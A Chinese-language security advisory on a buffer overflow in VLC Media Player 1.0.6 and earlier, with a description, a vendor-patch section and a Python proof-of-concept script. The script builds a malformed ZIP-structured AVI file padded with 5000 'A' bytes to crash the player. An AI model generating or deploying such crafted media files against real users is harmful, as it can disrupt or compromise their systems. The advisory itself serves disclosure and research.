发布日期：2010-05-28
更新日期：2010-05-28

受影响系统：

VideoLAN VLC Media Player 1.x

描述：

---

BUGTRAQ  ID: 40428

VLC Media Player是多媒体播放器。

VLC media player 1.0.6及其他版本存在缓冲区溢出漏洞，攻击者可利用此漏洞在受影响应用上下文中执行任意代码。

<*来源：Dr_IDE
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/python

######################################################################################################
#
# VLC Media Player <=1.0.6 Malformed Media File Crash PoC
# Found By: Dr_IDE
# Tested:   Windows 7, Ubuntu 9, OSX 10.6.X
# Download: http://www.videolan.org
# Notes:    Register overwrites seem very unpredictable at best...
# Greets:   Offsec and Corelan Teams
#
######################################################################################################
  
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
  
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00"
"\x00\x00\x00\x00\x00")
  
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")
  
filename = "VLC_Doesnt_Like_Videos_That_Are_Really_Zip_Files.AVI"
  
exploit = filename
exploit += "\x41" * 5000
  
print "[+] Writing file"

file = open('boom.avi','w'); #Anything here works, mpg, mp4, asf, mov etc...
file.write(ldf_header + exploit + cdf_header + exploit + eofcdf_header);
file.close()

print "[+] Exploit file created!!"

建议：

---

厂商补丁：

VideoLAN
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.videolan.org/

浏览次数：1420
严重程度：0（网友投票）